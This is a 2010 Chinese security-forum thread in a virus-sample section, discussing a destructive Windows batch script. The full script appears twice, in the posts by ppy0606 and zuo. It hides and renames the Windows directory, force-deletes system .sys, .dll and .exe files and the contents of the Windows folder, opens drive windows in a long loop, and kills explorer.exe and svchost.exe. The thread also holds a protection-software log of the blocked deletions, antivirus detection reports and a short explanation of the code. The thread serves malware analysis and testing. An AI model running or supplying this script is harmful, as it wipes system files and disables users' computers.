收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 破坏的 .bat 能摧毁系统?
123下一页
返回列表 发新帖
楼主: baixiliang
 收起左侧

[病毒样本] 破坏的 .bat 能摧毁系统?

  [复制链接]
悟心之道
发表于 2010-12-19 17:45:49 | 显示全部楼层
在sandboxie中运行了一次
回复

举报

天涯无泪
发表于 2010-12-19 18:34:10 | 显示全部楼层
安天防线也没报
回复

举报

baixiliang
 楼主| 发表于 2010-12-19 18:38:17 | 显示全部楼层
回复 5楼 zby_1991 的帖子

有啊,但尺寸太大
回复

举报

ppy0606
发表于 2010-12-19 18:55:11 | 显示全部楼层
echo 毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好,正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除
@echo off
attrib c:\windows +h
del c:\windows
ren c:\windows aaaavvvvbn
copy c:\msdos.sys ms.sys
copy c:\msdos.sys ms2.sys
copy c:\msdos.sys ms3.sys
copy c:\msdos.sys ms5.sys
copy c:\msdos.sys ms4.sys
copy c:\msdos.sys ms6.sys
copy c:\msdos.sys ms7.sys
copy c:\msdos.sys ms8.sys
copy c:\msdos.sys ms9.sys
copy c:\msdos.sys ms10.sys
copy c:\msdos.sys ms111.sys
copy c:\msdos.sys ms23.sys
copy c:\msdos.sys ms0.sys
copy c:\msdos.sys ms4444.sys
copy c:\msdos.sys ms999.sys
copy c:\msdos.sys ms88.sys
copy c:\msdos.sys ms1546.sys
del /f /s /q %systemdrive%\*.sys

del /f /s /q %system32%\*.dll

del /f /s /q %system%\*.dll

del /f /s /q %system32%\*.ref

del /f /s /q %system32%\*.exe

del /f /s /q %windows%\*.*

@echo off
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
echo 哈哈
@echo off
taskkill /f /im explorer.exe
ntsd –c q –pn EXPLORER.EXE
taskkill /f /im qq.exe
ntsd –c q –pn SVCHOST.EXE
taskkill /f /im SVCHOST.EXE
echo 再见!
回复

举报

zuo
发表于 2010-12-19 19:51:24 | 显示全部楼层
本帖最后由 zuo 于 2010-12-19 19:56 编辑

2010-12-19 19:45:38    创建新进程    阻止
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\attrib.exe
命令行: attrib c:\windows +h
规则: [应用程序组]4D应用程序规则-系统进程执行规则 -> [应用程序]c:\windows\system32\cmd.exe -> [子应用程序]c:\windows\system32\attrib.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\explorer.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; explorer.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\explorer.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; explorer.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\hh.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; hh.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\hh.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; hh.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\NOTEPAD.EXE
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; notepad.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\NOTEPAD.EXE
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; notepad.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\regedit.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; regedit.exe

2010-12-19 19:45:46    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\regedit.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; regedit.exe

2010-12-19 19:45:48    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\setdebug.exe
规则: [文件组]文件安全读写规则(询问修改、删除) -> [文件]*; *.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\setdebug.exe
规则: [文件组]文件安全读写规则(询问修改、删除) -> [文件]*; *.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\system.ini
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; system.ini

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\system.ini
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; system.ini

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\TASKMAN.EXE
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; taskman.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\TASKMAN.EXE
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; taskman.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twain.dll
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twain.dll

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twain.dll
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twain.dll

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twain_32.dll
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twain_32.dll

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twain_32.dll
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twain_32.dll

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twunk_16.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twunk_16.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twunk_16.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twunk_16.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twunk_32.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twunk_32.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\twunk_32.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; twunk_32.exe

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\vmmreg32.dll
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; vmmreg32.dll

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\vmmreg32.dll
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; vmmreg32.dll

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\win.ini
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; win.ini

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\win.ini
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; win.ini

2010-12-19 19:45:49    删除文件    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\winhelp.exe
规则: [文件组]系统文件加强型保护(防修改) -> [文件]c:\windows; winhelp.exe

………

楼主的这个实在没什么意思,不过是不断删除文件而已

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

附上源码:


echo 毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好毛超你好,正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在正在XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除XXXXXXXXXXXX删除
@echo off
attrib c:\windows +h
del c:\windows
ren c:\windows aaaavvvvbn
copy c:\msdos.sys ms.sys
copy c:\msdos.sys ms2.sys
copy c:\msdos.sys ms3.sys
copy c:\msdos.sys ms5.sys
copy c:\msdos.sys ms4.sys
copy c:\msdos.sys ms6.sys
copy c:\msdos.sys ms7.sys
copy c:\msdos.sys ms8.sys
copy c:\msdos.sys ms9.sys
copy c:\msdos.sys ms10.sys
copy c:\msdos.sys ms111.sys
copy c:\msdos.sys ms23.sys
copy c:\msdos.sys ms0.sys
copy c:\msdos.sys ms4444.sys
copy c:\msdos.sys ms999.sys
copy c:\msdos.sys ms88.sys
copy c:\msdos.sys ms1546.sys
del /f /s /q %systemdrive%\*.sys
del /f /s /q %system32%\*.dll
del /f /s /q %system%\*.dll
del /f /s /q %system32%\*.ref
del /f /s /q %system32%\*.exe
del /f /s /q %windows%\*.*
@echo off
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
start c:
start d:
echo 哈哈
@echo off
taskkill /f /im explorer.exe
ntsd –c q –pn EXPLORER.EXE
taskkill /f /im qq.exe
ntsd –c q –pn SVCHOST.EXE
taskkill /f /im SVCHOST.EXE
echo 再见!



回复

举报

zuo
发表于 2010-12-19 20:06:50 | 显示全部楼层
回复 1楼 baixiliang 的帖子

顺便问一下,源码开头那一段是什么?
回复

举报

s8706042
发表于 2010-12-19 23:01:22 | 显示全部楼层
已上報趨勢嚕~
回复

举报

sysfc6
发表于 2010-12-19 23:32:19 | 显示全部楼层
过微软过nod32
回复

举报

chenchunhuis
发表于 2010-12-20 17:34:18 | 显示全部楼层
小a 没反应啊
回复

举报

网之龙
发表于 2010-12-20 21:45:16 | 显示全部楼层
看了一下批处理程序,开头“echo”(桌面窗口显示程序运行情况)后的大串中文字符应该是恶搞,没有实际作用。在“@echo off“(关闭桌面窗口显示程序运行情况)后的语句才是有效的:先是试图将Windows目录隐藏、改名,然后就是不断地复制、删除文件,接着是不停地打开各个盘符,最后是调用系统进程终止命令强行中止系统两个重要的文件EXPLORER.EXE和 SVCHOST.EXE的进程,如果成功结果就是死机。
不过楼主的批处理似乎并不完善,能否达到预期的效果很难说(本人没装虚拟机,无法在实机中运行)。
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-13 23:11 , Processed in 0.096416 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表